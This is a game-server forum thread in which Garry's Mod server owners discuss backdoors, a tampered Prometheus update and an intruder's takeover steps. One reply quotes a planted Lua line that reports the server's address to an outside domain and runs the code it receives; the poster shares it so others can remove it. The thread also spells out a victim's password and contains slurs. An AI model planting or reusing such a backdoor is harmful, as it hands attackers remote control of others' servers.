Server getting hacked (causing me to have to restart it) - Help

Basically there this "Lizard Squad" thing that has happened on my DarkRP server twice now, a friend recorded it - [url]https://www.youtube.com/watch?v=-exSbQsZy80[/url] I have no idea what's causing it or how to stop it, but I have to restart the entire server to stop it, so everyone loses whatever they've made/bought, and we lose players due to that.

By chance you wouldn't happen to have that drugs mod from the workshop would you? Because that's got a backdoor in it, and if you do, remove it now.

Nah we don't, removed it somewhat recently

Someone may have left a backdoor in your server after the drugs mod fiasco.

[QUOTE=aultraman123;50458240]Basically there this "Lizard Squad" thing that has happened on my DarkRP server twice now, a friend recorded it - [url]https://www.youtube.com/watch?v=-exSbQsZy80[/url] I have no idea what's causing it or how to stop it, but I have to restart the entire server to stop it, so everyone loses whatever they've made/bought, and we lose players due to that.[/QUOTE] It could be an E2 if you have wire installed?

[QUOTE=Bings;50458818]It could be an E2 if you have wire installed?[/QUOTE] E2 wouldnt be able to do what the video shows. (not unless all the content, pics and audio is on the server and its using holo i guess but still unlikely) Sounds like a backdoor and someone running lua

Oh yea, this happened to us too. [IMG]http://i.imgur.com/kJt12A9.jpg/[/IMG] Make sure to remove the code he put in your ULX Config [CODE]lua_run timer.Simple(30, function() http.Fetch("https/xn--vxao.pw/tracker.php?port=" .. GetConVar("hostport&quot:GetString() .. "&ip=" .. game:GetIPAddress() .. "&addon=" .. GetHostName():Replace(" ", "%20&quot, function(body) RunString(body, "lua/init.lua&quot end, function() end) end)[/CODE] Also if your server isn't starting it's because he set kickAfterNameChanges or kickAfterNameChangesWarning to something wonky which is in the config file also. I forget since I deleted most logs of all of this happening at 4 AM, my thought process was to quickly attempt to fix it and then see if he would be able to reproduce it. I also emptied out all of my data folders that weren't needed since the server kept unbanning his IP and SteamID every tick, seems to be solved now. I don't know how he did it to be honest. The nice thing is, he didn't entirely fuck the server since it seems he was only in it to play around which is fine by me. I don't run too many workshop addons and the ones I use are mostly just models or basic sweps so I don't think the exploit happened there. When I finally got around to checking the damage (it was 4 AM and I was asleep), he added himself to superadmin and then added a playersay hook through FAdmins rcon that would compile anything he said in chat. Then he made himself immune to being banned by ulx and set CAC's MoveHandler to nil and made everyone into massive chairs. Fun times, fun times. I did a few things here and there but i'm pretty sure he can walk around the security checks I added, I will be looking into more security holes throughout the day. If you're a server owner and you're reading this, I would watch out for when this guy joins your server. [URL="https://steamcommunity.com/id/notnotbanksy"]https://steamcommunity.com/id/notnotbanksy[/URL]

Looks like he's using the code I posted in this thread ages ago. [url]https://facepunch.com/showthread.php?t=1482008[/url]

[QUOTE=dence47;50459959]snip[/QUOTE] Banksy also found the prometheus 'backdoor' shell that you should remove [sp]That he used to do that[/sp]

If you have Prometheus and updated it to 1.6.3.9 the last 24 hours then check your packages' custom actions and remove any suspicious ones, also make sure to disable the package from anyone who bought it the last 24 hours. Check your Prometheus folder for buystats.php and delete it. Then make sure nobody who isn't supposed to have admin on Prometheus has it. Someone breached the update system yesterday and added a malicious file to it. The issue has now been resolved and only people who updated to 1.6.3.9(even though this update is several weeks old..) the last 24 hours were affected.

[QUOTE=dence47;50459959]Oh yea, this happened to us too. [IMG]http://i.imgur.com/kJt12A9.jpg/[/IMG] -snip- [/QUOTE] You should change your passwords, specifically the ones that start with O and end with 47, you should use a password manager like LastPass or just use randomly generated passwords for everything, and don't have your MySQL password as a password you use for your own accounts either, especially when it's sitting around in a plaintext file on your web server. Anyone else affected by what I was doing should also be changing their MySQL passwords.

Not "Orangejuice47" that's like, the strongest password ever!

[QUOTE=Banksy.;50461919]You should change your passwords, specifically the ones that start with O and end with 47, you should use a password manager like LastPass or just use randomly generated passwords for everything, and don't have your MySQL password as a password you use for your own accounts either, especially when it's sitting around in a plaintext file on your web server. Anyone else affected by what I was doing should also be changing their MySQL passwords.[/QUOTE] Thank you for the information. I will work on this now.

Is Lizard Squad actually capable of hacking or do they just borrow other people's stuff? I've actually helped a Lizard Squad "member" setup his darkrp server and when I said they were a bunch of fags he threatened me. I laughed and told him if he sassed me I'd fuck up his leaked Prometheus install.

[QUOTE=YourStalker;50467852]Is Lizard Squad actually capable of hacking or do they just borrow other people's stuff? I've actually helped a Lizard Squad "member" setup his darkrp server and when I said they were a bunch of fags he threatened me. I laughed and told him if he sassed me I'd fuck up his leaked Prometheus install.[/QUOTE] The whole lizard squad thing was a joke, whoever believes it honestly needs to get some common sense, especially if they believe the fact that they would be sitting around playing garry's mod.